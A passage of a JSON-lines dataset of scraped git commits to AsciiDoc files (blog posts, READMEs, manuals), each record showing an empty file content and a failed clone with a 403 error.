2016-04-01-First-Post.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-01-First-Post.adoc","new_file":"_posts\/2016-04-01-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54fd606a9cfcfb6388be4d8b435accf3bb95abbb","subject":"Remove clojurescript note on try monad doc.","message":"Remove clojurescript note on try monad doc.\n","repos":"funcool\/cats,yurrriq\/cats,mccraigmccraig\/cats,alesguzik\/cats,tcsavage\/cats,OlegTheCat\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"edb0ded618b7f46946651366ef626f8634c36010","subject":"Improved developers guide section on the documentation.","message":"Improved developers guide section on the documentation.\n","repos":"OlegTheCat\/cats,yurrriq\/cats,tcsavage\/cats,mccraigmccraig\/cats,funcool\/cats,alesguzik\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5e4fcefd8b0aea9574e7bce738f5db08db1a298d","subject":"Update 2016-03-15-Installing-Sentry-with-Docker.adoc","message":"Update 2016-03-15-Installing-Sentry-with-Docker.adoc","repos":"natsu90\/hubpress.io,natsu90\/hubpress.io,natsu90\/hubpress.io","old_file":"_posts\/2016-03-15-Installing-Sentry-with-Docker.adoc","new_file":"_posts\/2016-03-15-Installing-Sentry-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/natsu90\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd6c0bd02cb35b2d173f4e21073e385f5e99b9d7","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jax-rs\/crud\/readme.adoc","new_file":"jax-rs\/crud\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4deb866949efba67737fee16faddfba22e60952","subject":"Publish 20161110-1347.adoc","message":"Publish 20161110-1347.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1347.adoc","new_file":"20161110-1347.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3b98c7fe46d1ecfc6246b76fbc2282ad61c0afb","subject":"doc encoding support","message":"doc encoding 
support\n","repos":"juntalis\/ninja,ctiller\/ninja,ninja-build\/ninja,ilor\/ninja,vvvrrooomm\/ninja,sxlin\/dist_ninja,yannicklm\/ninja,Qix-\/ninja,lizh06\/ninja,nico\/ninja,maximuska\/ninja,atetubou\/ninja,atetubou\/ninja,jimon\/ninja,mgaunard\/ninja,maximuska\/ninja,martine\/ninja,PetrWolf\/ninja-main,barak\/ninja,metti\/ninja,iwadon\/ninja,autopulated\/ninja,ukai\/ninja,ikarienator\/ninja,guiquanz\/ninja,juntalis\/ninja,jendrikillner\/ninja,kimgr\/ninja,Ju2ender\/ninja,sorbits\/ninja,pathscale\/ninja,ndsol\/subninja,ThiagoGarciaAlves\/ninja,yannicklm\/ninja,mohamed\/ninja,chenyukang\/ninja,ThiagoGarciaAlves\/ninja,TheOneRing\/ninja,dpwright\/ninja,rjogrady\/ninja,ikarienator\/ninja,okuoku\/ninja,mgaunard\/ninja,vvvrrooomm\/ninja,ehird\/ninja,iwadon\/ninja,Qix-\/ninja,rjogrady\/ninja,tfarina\/ninja,dorgonman\/ninja,purcell\/ninja,ctiller\/ninja,nafest\/ninja,kimgr\/ninja,fifoforlifo\/ninja,colincross\/ninja,yannicklm\/ninja,ignatenkobrain\/ninja,dabrahams\/ninja,curinir\/ninja,glensc\/ninja,hnney\/ninja,tfarina\/ninja,glensc\/ninja,bradking\/ninja,metti\/ninja,curinir\/ninja,yannicklm\/ninja,ndsol\/subninja,guiquanz\/ninja,martine\/ninja,rnk\/ninja,ilor\/ninja,ikarienator\/ninja,maruel\/ninja,curinir\/ninja,dendy\/ninja,LuaDist\/ninja,pck\/ninja,TheOneRing\/ninja,jendrikillner\/ninja,jimon\/ninja,automeka\/ninja,juntalis\/ninja,jsternberg\/ninja,nafest\/ninja,lizh06\/ninja,hnney\/ninja,TheOneRing\/ninja,liukd\/ninja,sxlin\/dist_ninja,kissthink\/ninja,nafest\/ninja,juntalis\/ninja,pck\/ninja,pck\/ninja,barak\/ninja,ukai\/ninja,dpwright\/ninja,barak\/ninja,maruel\/ninja,ThiagoGarciaAlves\/ninja,mutac\/ninja,dabrahams\/ninja,bradking\/ninja,fifoforlifo\/ninja,dendy\/ninja,mydongistiny\/ninja,kissthink\/ninja,pathscale\/ninja,dorgonman\/ninja,purcell\/ninja,nickhutchinson\/ninja,Maratyszcza\/ninja-pypi,rjogrady\/ninja,drbo\/ninja,liukd\/ninja,mdempsky\/ninja,Maratyszcza\/ninja-pypi,nafest\/ninja,dorgonman\/ninja,ehird\/ninja,curinir\/ninja,colincross\/ninja,nocnokneo\/ninja,dorgonman\/ninja,ilor\/ninja,lizh06\/ninja,mutac\/ninja,vvvrrooomm\/ninja,ctiller\/ninja,TheOneRing\/ninja,fifoforlifo\/ninja,pathscale\/ninja,sorbits\/ninja,synaptek\/ninja,sorbits\/ninja,PetrWolf\/ninja-main,ninja-build\/ninja,ndsol\/subninja,nicolasdespres\/ninja,moroten\/ninja,mutac\/ninja,tfarina\/ninja,sgraham\/ninja,mgaunard\/ninja,ThiagoGarciaAlves\/ninja,lizh06\/ninja,mydongistiny\/ninja,ctiller\/ninja,metti\/ninja,purcell\/ninja,rnk\/ninja,syntheticpp\/ninja,kissthink\/ninja,syntheticpp\/ninja,metti\/ninja,chenyukang\/ninja,drbo\/ninja,jhanssen\/ninja,mutac\/ninja,kimgr\/ninja,sxlin\/dist_ninja,dpwright\/ninja,iwadon\/ninja,mdempsky\/ninja,kissthink\/ninja,ukai\/ninja,moroten\/ninja,guiquanz\/ninja,mgaunard\/ninja,AoD314\/ninja,maruel\/ninja,Qix-\/ninja,pathscale\/ninja,jendrikillner\/ninja,sorbits\/ninja,vvvrrooomm\/ninja,atetubou\/ninja,nocnokneo\/ninja,mdempsky\/ninja,sgraham\/ninja,jsternberg\/ninja,synaptek\/ninja,nico\/ninja,LuaDist\/ninja,PetrWolf\/ninja-main,purcell\/ninja,sxlin\/dist_ninja,iwadon\/ninja,ukai\/ninja,nickhutchinson\/ninja,dendy\/ninja,drbo\/ninja,dpwright\/ninja,AoD314\/ninja,Maratyszcza\/ninja-pypi,jhanssen\/ninja,sxlin\/dist_ninja,autopulated\/ninja,bmeurer\/ninja,syntheticpp\/ninja,ndsol\/subninja,nocnokneo\/ninja,PetrWolf\/ninja-main,mohamed\/ninja,hnney\/ninja,mydongistiny\/ninja,mydongistiny\/ninja,fuchsia-mirror\/third_party-ninja,glensc\/ninja,liukd\/ninja,fuchsia-mirror\/third_party-ninja,sxlin\/dist_ninja,maximuska\/ninja,bmeurer\/ninja,nicolasdespres\/ninja,fuchsia-mirror\/third_
party-ninja,pck\/ninja,nicolasdespres\/ninja,martine\/ninja,jimon\/ninja,chenyukang\/ninja,fuchsia-mirror\/third_party-ninja,AoD314\/ninja,nico\/ninja,colincross\/ninja,ilor\/ninja,rnk\/ninja,syntheticpp\/ninja,jsternberg\/ninja,chenyukang\/ninja,automeka\/ninja,fifoforlifo\/ninja,ninja-build\/ninja,ehird\/ninja,ninja-build\/ninja,barak\/ninja,nicolasdespres\/ninja,bradking\/ninja,ikarienator\/ninja,rjogrady\/ninja,tfarina\/ninja,glensc\/ninja,bmeurer\/ninja,sxlin\/dist_ninja,atetubou\/ninja,synaptek\/ninja,Ju2ender\/ninja,sgraham\/ninja,jhanssen\/ninja,mohamed\/ninja,okuoku\/ninja,dendy\/ninja,ignatenkobrain\/ninja,moroten\/ninja,nocnokneo\/ninja,Qix-\/ninja,mohamed\/ninja,kimgr\/ninja,maximuska\/ninja,automeka\/ninja,liukd\/ninja,autopulated\/ninja,jimon\/ninja,jhanssen\/ninja,Ju2ender\/ninja,nickhutchinson\/ninja,rnk\/ninja,AoD314\/ninja,ehird\/ninja,mdempsky\/ninja,Maratyszcza\/ninja-pypi,colincross\/ninja,drbo\/ninja,nico\/ninja,automeka\/ninja,sgraham\/ninja,jsternberg\/ninja,guiquanz\/ninja,bmeurer\/ninja,synaptek\/ninja,ignatenkobrain\/ninja,martine\/ninja,hnney\/ninja,autopulated\/ninja,LuaDist\/ninja,moroten\/ninja,ignatenkobrain\/ninja,dabrahams\/ninja,okuoku\/ninja,nickhutchinson\/ninja,dabrahams\/ninja,bradking\/ninja,LuaDist\/ninja,Ju2ender\/ninja,okuoku\/ninja,maruel\/ninja,jendrikillner\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a10505930b668ba3dd35717d01d2c3beff6c7afc","subject":"v0.2 packet builder","message":"v0.2 packet builder\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"packet_builder_yaml.asciidoc","new_file":"packet_builder_yaml.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d7200fff924632b0b8feb23d2e5fd9e5d74a3460","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46dd512df5b4e04df4cc7ae9767aad97c4602634","subject":"y2b create post THE GREATEST CABLE EVER","message":"y2b create post THE GREATEST CABLE EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-18-THE-GREATEST-CABLE-EVER.adoc","new_file":"_posts\/2016-06-18-THE-GREATEST-CABLE-EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"4dcd82d39b1de1642aca46533427424fff12703a","subject":"Update 2017-12-19-P-H-Per-Golang.adoc","message":"Update 2017-12-19-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-19-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-19-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ddede8304456836246181d9d5450d5fa8bc6617","subject":"Adds or corrects documentation.","message":"Adds or corrects documentation.\n","repos":"cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp","old_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/steps-fileupload.adoc","new_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/steps-fileupload.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortizqgithub\/csoftz-rp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"986a331bac541c24a7cee68ed87d3bd8212792bb","subject":"Update 2016-11-21-Developpemen-de-lusae-de-la-Blockchain-dans-lagroalimentaire-a-la-fin-2017.adoc","message":"Update 2016-11-21-Developpemen-de-lusae-de-la-Blockchain-dans-lagroalimentaire-a-la-fin-2017.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2016-11-21-Developpemen-de-lusae-de-la-Blockchain-dans-lagroalimentaire-a-la-fin-2017.adoc","new_file":"_posts\/2016-11-21-Developpemen-de-lusae-de-la-Blockchain-dans-lagroalimentaire-a-la-fin-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b91561a53e9f0e64e6200bbc19b2e93d18637f80","subject":"add english docs for the component designs","message":"add english docs for the component designs\n","repos":"markllama\/hexgame,markllama\/hexgame","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/hexgame.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f71c9fa2889fd0bbdcf120f5694fd480f58a016b","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"0051caad83142b2578f1d2745ff05d6d119c45bd","subject":"Update 2016-08-26-Java-EE-7-Training-resources.adoc","message":"Update 2016-08-26-Java-EE-7-Training-resources.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2016-08-26-Java-EE-7-Training-resources.adoc","new_file":"_posts\/2016-08-26-Java-EE-7-Training-resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04cd4a4116fa58d4ce49d7f75d05a82514c6d900","subject":"Renamed '_posts\/2017-10-15-First-tip-find-your-HOME.adoc' to '_posts\/2017-10-15-Find-your-HOME.adoc'","message":"Renamed '_posts\/2017-10-15-First-tip-find-your-HOME.adoc' to '_posts\/2017-10-15-Find-your-HOME.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-15-Find-your-HOME.adoc","new_file":"_posts\/2017-10-15-Find-your-HOME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"519050f4d3333f479c367d0036b2f350d448ee12","subject":"y2b create post 11.1 SURROUND!? (Superunknown Super Deluxe Edition)","message":"y2b create post 11.1 SURROUND!? (Superunknown Super Deluxe Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-03-111-SURROUND-Superunknown-Super-Deluxe-Edition.adoc","new_file":"_posts\/2014-06-03-111-SURROUND-Superunknown-Super-Deluxe-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"377c0c02aea3eb5274ea0f1609477be680437f69","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d326bc0e084840311415b63962eda502a12a13bb","subject":"Deleted 2016-6-27-file-getput-content.adoc","message":"Deleted 2016-6-27-file-getput-content.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-file-getput-content.adoc","new_file":"2016-6-27-file-getput-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"bd31926ba87fb5f77971cb54d8b0cdf22f117be6","subject":"Delete the file at '_posts\/2016-03-04-New-System.adoc'","message":"Delete the file at '_posts\/2016-03-04-New-System.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4daed2ba6741a3bd54951007935164141c81e4c","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/06\/25\/deref.adoc","new_file":"content\/news\/2021\/06\/25\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fc3b8b7b5ffdca4d44e0310c230cd68f4efdbad5","subject":"Section 1 of documentation complete.","message":"Section 1 of documentation complete.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/what_is_recordtrac.adoc","new_file":"docs\/what_is_recordtrac.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59aea01fa0d013112741ae8b973c587dc4e41268","subject":"Changelog added","message":"Changelog added\n","repos":"asciidoctor\/brackets-asciidoc-preview,nixionx\/brackets-asciidoc-preview,nixionx\/brackets-asciidoc-preview","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nixionx\/brackets-asciidoc-preview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0709d62b93ecb3ad92dc29deceb1f00af665197","subject":"Update 2014-05-31-Use-Drush.adoc","message":"Update 2014-05-31-Use-Drush.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-05-31-Use-Drush.adoc","new_file":"_posts\/2014-05-31-Use-Drush.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"396db68dad20823a04a044feae63bc55f419f6c7","subject":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","message":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47b7d138f42124307f46f9ccb37309f2bb3593bf","subject":"update 
title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/the_best_game.adoc","new_file":"content\/writings\/the_best_game.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5ddb46f4148500535d6ccfda6305012a497eeff2","subject":"Update 2015-09-24-AS-kjj.adoc","message":"Update 2015-09-24-AS-kjj.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-24-AS-kjj.adoc","new_file":"_posts\/2015-09-24-AS-kjj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baa938a702ce5a2a9015a8be832730b626d29fac","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"115b013750cb7af93fe514d8c24cf9fcb67d3ada","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b96f3e2dab5527cfee6f12aed5e3efed53da279","subject":"README: Adding README.asciidoc","message":"README: Adding README.asciidoc\n\nAdding a README.asciidoc as github renders the\n.asciidoc files. 
README.asciidoc is a soft link\nto original 0.Readme.txt.\n\nSigned-off-by: Lalatendu Mohanty <51e26f8eb794e7391b5ea8128d9ade5c4c5ae20b@redhat.com>\n","repos":"ubiqx-org\/Carnaval,manuella\/Carnaval","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ubiqx-org\/Carnaval.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"5a6caebf42eb367f7e4a3d983623591a6a298c0a","subject":"Update 2017-01-28-Markov.adoc","message":"Update 2017-01-28-Markov.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Markov.adoc","new_file":"_posts\/2017-01-28-Markov.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fc2151b91bfe8cd2674c20e992bfe0a59072b3f","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fede11904044639f18e66686afe31a1d482ce02d","subject":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","message":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb87bf97ebb53735ae6bbd531fc7ad9efe9724fe","subject":"Update 2017-12-04-Selenium-Google-Apps-Script.adoc","message":"Update 2017-12-04-Selenium-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-04-Selenium-Google-Apps-Script.adoc","new_file":"_posts\/2017-12-04-Selenium-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7906744ef4d42ece914ffeb0b9631cb6237df340","subject":"y2b create post I've Never Tried Anything Like It...","message":"y2b create post I've Never Tried Anything Like 
It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-14-IveNeverTriedAnythingLikeIt.adoc","new_file":"_posts\/2018-02-14-IveNeverTriedAnythingLikeIt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2afceab284f9e903c5873fd296dc160c27173b59","subject":"Renamed '_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc' to '_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc'","message":"Renamed '_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc' to '_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc'","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2017-09-24-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0d34f4cc25d9c6afc95274964020116c8aa6c72","subject":"Update 2015-07-11-Fabric8-Developer-cheat-sheet.adoc","message":"Update 